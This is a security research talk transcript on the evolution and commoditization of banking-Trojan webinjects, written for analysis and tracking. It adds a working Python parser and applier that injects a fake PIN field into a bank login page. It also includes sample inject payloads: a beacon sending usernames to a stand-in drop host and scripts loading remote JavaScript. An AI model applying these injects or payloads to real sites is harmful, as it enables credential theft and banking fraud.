The Evolution of Webinjects
DESCRIPTION
Webinject files are now ubiquitous in the banking Trojan world, where they are used to aid financial fraud. What started as private code tied to a single malware family has blossomed into a full ecosystem in which independent coders sell their services to botnet herders. This specialization can be observed in underground forums, where a growing number of offers advertise fully functional webinject packages providing everything required to bypass the latest security measures put in place by financial institutions. Our research covers the current webinject scene and its commoditization. We look back at how it has evolved over time, from simple phishing-like functionality to automatic transfer systems (ATS) and two-factor authentication bypass, along with mobile components and full-fledged web control panels to manage money exfiltration through fraudulent money transfers. Nowadays, malware able to inject arbitrary HTML content into a browser is all a resourceful bot master needs, since practically every other step required to perform a successful fraudulent transfer can be outsourced. This is confirmed by our recent observation of several malware families using the same webinject kits. Our research tries to answer this question: will we see a consolidation phase leading to the emergence of a few select omnipresent webinject kits, similar to what we have seen in the Web exploit kit scene?

TRANSCRIPT
The evolution of webinjects
Jean-Ian Boutin
ESET
Outline
• Webinject Evolution
• Webinject Commoditization
• Emergence of Popular Kits
• Webinject Delivery
Webinject Evolution
The Beginnings
• Keyloggers
• Form grabbing
– Inspect GET/POST requests
• Injects are written specifically for one banking Trojan platform
• Only a couple of institutions are covered
• Targeted institutions are tied to one geographic region
Popular webinject format (the slides annotate one element of a sample file at a time)
• Keyword indicating which URL is targeted
• Target URL
• Flags (Get, Post)
• Keywords specifying where the code should be injected in the webpage
• Code to inject
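As an added example (not code from the talk), here is a small Python parser and applier for the Zeus-style webinject format the slides depict: a set_url line carrying the target URL and the G/P (GET/POST) flags, followed by data_before, data_inject and data_after blocks, each closed by data_end. The bank URL, the login page and the extra PIN field being injected are constructed for the example; the injected field also illustrates the "injection of additional fields" functionality listed later in the talk. Other flags the format defines are ignored here.

```python
"""Parser and applier for the Zeus-style webinject format.

Added example, not code from the talk.  The keywords (set_url,
data_before, data_inject, data_after, data_end) are those of the
format the slides depict; the bank URL, page and injected field are
constructed for illustration.
"""
from __future__ import annotations

import fnmatch
from dataclasses import dataclass


@dataclass
class WebInject:
    url_pattern: str       # set_url target, '*' is a wildcard
    flags: str             # G = fire on GET responses, P = on POST responses
    before: str = ""       # data_before: literal anchor the injection follows
    inject: str = ""       # data_inject: HTML/JS placed at the anchor
    after: str = ""        # data_after: literal anchor the injection precedes


def parse_webinjects(config: str) -> list[WebInject]:
    """Turn a webinject config into WebInject records, one per set_url."""
    injects: list[WebInject] = []
    current: WebInject | None = None
    section: str | None = None
    buf: list[str] = []
    for raw in config.splitlines():
        line = raw.strip()
        if line.startswith("set_url "):
            parts = line.split()              # set_url <pattern> [flags]
            current = WebInject(parts[1], parts[2] if len(parts) > 2 else "GP")
            injects.append(current)
        elif line in ("data_before", "data_inject", "data_after"):
            section, buf = line, []
        elif line == "data_end":
            if current is None or section is None:
                raise ValueError("data_end outside a set_url/data_* block")
            setattr(current, section[len("data_"):], "\n".join(buf))
            section = None
        elif section is not None:
            buf.append(raw)                   # keep payload lines verbatim
    return injects


def matches(inject: WebInject, url: str, method: str) -> bool:
    """Does the inject fire for this URL and HTTP method (the G/P flags)?"""
    flag = {"GET": "G", "POST": "P"}.get(method.upper())
    if flag is None or flag not in inject.flags:
        return False
    # fnmatch provides the '*' wildcard; '?' and '[' in the pattern would
    # also be special, so a set_url containing them must be escaped.
    return fnmatch.fnmatchcase(url, inject.url_pattern)


def apply_inject(inject: WebInject, body: str) -> tuple[str, bool]:
    """Insert data_inject between the anchors; everything between
    data_before and data_after is replaced.  Anchors are matched as
    literal substrings, so an inject silently stops working when the
    bank changes its markup, which is why kits come with maintenance."""
    start = 0
    if inject.before:
        start = body.find(inject.before)
        if start == -1:
            return body, False
        start += len(inject.before)
    end = start
    if inject.after:
        end = body.find(inject.after, start)
        if end == -1:
            return body, False
    return body[:start] + inject.inject + body[end:], True


# Constructed sample config: add a PIN field right after the password box
CONFIG = """\
set_url https://online.bank.example/login* GP
data_before
<input type="password" name="password">
data_end
data_inject
<label>PIN</label><input type="text" name="pin">
data_end
data_after
data_end
"""

# Constructed stand-in for the bank's login page
PAGE = """<html><body>
<form action="/login" method="post">
  <input type="text" name="user">
  <input type="password" name="password">
  <input type="submit" value="Log in">
</form>
</body></html>"""


def demo(url: str = "https://online.bank.example/login?lang=en",
         method: str = "GET") -> tuple[str, bool]:
    """Return the page as the victim's browser would see it for this request."""
    for inj in parse_webinjects(CONFIG):
        if matches(inj, url, method):
            return apply_inject(inj, PAGE)
    return PAGE, False


if __name__ == "__main__":
    print(demo()[0])
```

Running demo() shows the PIN field appearing between the password box and the submit button for a request to the login page, and the untouched page for any other URL; the victim sees one extra field on what is otherwise the genuine, TLS-protected bank page, which is why this beats classic phishing.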
Increase in Functionalities
• Login grabber
• Injection of additional fields
• Balance grabber/changer
• TAN grabber
• Full Automatic Transfer Systems (ATS or AZ, from avtozaliv)
Phish-like inject (slide screenshot)
Automatic Transfer Systems
• Allow transfers to be done automatically
• Injected code is able to browse to the correct page, fill in the transfer information, etc.
• Not as attractive nowadays due to complexity
Transaction Authorization Number (TAN)
• Several form factors exist
Social Engineering (1/2)
• Inject content tricking the user into entering a TAN
Social Engineering (2/2)
• Inject content tricking the user into installing a malicious application
Popular Webservices Targeted
• Extra content is injected as soon as the user logs into their account
• Usually phishing-like webinjects
Webinject Commoditization
Custom Tools (slide screenshot)
Cheap Webinjects (slide screenshot)
ATS
• Some webinject sellers include Android components to bypass mTAN
Panels
• Some scripts with advanced capabilities come with an administration panel
Public/Private webinjects and Partnerships
• Two types of offering for webinjects
– Public
– Private
• Partnerships, where revenue is shared, are also mentioned by some inject coders
Emergence of Popular Kits
ATSEngine
• ATSEngine panel screenshots (slide)
• Seen in Qadars, ZeusVM, Neverquest/Vawtrak, Citadel, GOZ (Gameover Zeus)
Injeria
• Used in several banking Trojans: Qadars, Tilon, Torpig
• JS downloaded from an external source, using a distinctive URL
• Several different project types
– log-<project-name>
– mob-<project-name>
– req-<project-name>
– app-<project-name>
How to track them?
• The code and URL structures
• The admin panel design
• Sometimes features can be correlated with underground adverts
ATSEngine - ID (slide screenshots)
Webinject Delivery
Inline vs. external downloads (slide screenshots)
JS – External Download
• Advantages
– Hinder forensic analysis (the real code is not in the captured config)
– Feature-based selling
– Maintenance by the original seller
– New webinject code does not have to be downloaded by the bot right away; it is fetched from the external server when the inject fires
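To make the inline versus external-download distinction concrete, and to show how URL structure can be used to track a kit across campaigns, here is an added Python example that is not the talk's own tooling. The inject snippets, the bank hostname and the loader URL layout are all constructed; the `log-<project-name>` path segment borrows the Injeria project naming listed earlier only as an assumed example of where such a name might appear, and a real kit's URL structure has to be learned from samples.

```python
"""Classify webinject payloads as inline or external-download and reduce
the external URLs to their structure for tracking.

Added example, not the talk's own tooling.  The snippets, hostnames and
URL layout below are constructed; the log-/mob-/req-/app- segment
mirrors the Injeria project naming from the slides as an assumption
about where it could show up in a URL.
"""
import re
from urllib.parse import urlsplit

URL_LITERAL = re.compile(r"""https?://[^\s"'<>)]+""", re.I)
SCRIPT_SRC = re.compile(r"""<script[^>]*\ssrc\s*=\s*["']([^"']+)["']""", re.I)
CREATE_SCRIPT = re.compile(r"""createElement\(\s*["']script["']\s*\)""", re.I)
PROJECT_SEG = re.compile(r"^(log|mob|req|app)-[\w.-]+$", re.I)

BANK_HOST = "online.bank.example"          # constructed target institution


def _off_bank(urls, bank_host):
    """Keep only URLs whose host is not the bank or one of its subdomains."""
    out = set()
    for u in urls:
        host = urlsplit(u).hostname
        if host and host != bank_host and not host.endswith("." + bank_host):
            out.add(u)
    return sorted(out)


def contacted_urls(payload, bank_host=BANK_HOST):
    """Every absolute http(s) URL in the payload that is not the bank's own."""
    return _off_bank(URL_LITERAL.findall(payload), bank_host)


def classify(payload, bank_host=BANK_HOST):
    """inline: self-contained; inline-with-callback: code is inline but
    reports to an external server; external-download: the real code is
    fetched from an external server at run time, so the captured config
    alone does not contain it."""
    off = contacted_urls(payload, bank_host)
    if not off:
        return "inline"
    if _off_bank(SCRIPT_SRC.findall(payload), bank_host):
        return "external-download"          # <script src="https://..."> off-bank
    if CREATE_SCRIPT.search(payload):
        return "external-download"          # DOM-built script element + off-bank URL
    return "inline-with-callback"


def url_template(url):
    """Collapse campaign-specific parts (project name, long hex ids, query
    values) so loaders from the same kit share one template."""
    parts = urlsplit(url)
    segs = []
    for seg in parts.path.split("/"):
        if PROJECT_SEG.match(seg):
            seg = seg.split("-", 1)[0] + "-<project>"
        elif re.fullmatch(r"[0-9a-f]{8,}(\.\w+)?", seg, re.I):
            seg = "<id>" + (seg[seg.index("."):] if "." in seg else "")
        segs.append(seg)
    query = re.sub(r"=[^&]*", "=<v>", parts.query)
    tmpl = f"{parts.scheme}://{parts.hostname}" + "/".join(segs)
    return tmpl + (f"?{query}" if query else "")


# Constructed inject payloads, as they would sit in a data_inject block
SAMPLES = {
    "inline-grabber": """<script>
document.forms[0].onsubmit = function () { window.name = document.forms[0].user.value; };
</script>""",
    "tag-loader": """<script type="text/javascript"
 src="https://cdn-static.example.org/js/log-bankone/5a3f9c2d1e8b7a60.js"></script>""",
    "dom-loader": """<script>
var s = document.createElement('script');
s.src = 'https://cdn-static.example.org/js/log-banktwo/0c1d2e3f4a5b6c7d.js';
document.getElementsByTagName('head')[0].appendChild(s);
</script>""",
    "inline-beacon": """<script>
new Image().src = 'https://drop.example.net/b.php?u=' + encodeURIComponent(document.forms[0].user.value);
</script>""",
}


def summarize(samples=SAMPLES, bank_host=BANK_HOST):
    """name -> (class, sorted URL templates) for a batch of injects."""
    return {
        name: (classify(p, bank_host),
               sorted({url_template(u) for u in contacted_urls(p, bank_host)}))
        for name, p in samples.items()
    }


if __name__ == "__main__":
    for name, (kind, templates) in summarize().items():
        print(f"{name:15} {kind:22} {templates}")
```

The two loaders differ in project name, file id and loading technique but collapse to the same template, which is the kind of URL-structure signal the "How to track them?" slide refers to; the external-download class is also the one where a forensic copy of the bot's config is not enough and the hosted JS must be captured as well.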
External Server Interactions (slide screenshots)
Conclusion
• Webinjects have evolved tremendously in the past few years
• In several banking Trojans, the webinject is the true attack code
• Webinject commoditization is well in place
• Several webinject platforms are available, and some are clearly more popular than others
• Special thanks to Anton Cherepanov
• Questions?
@jiboutin
Thank You!!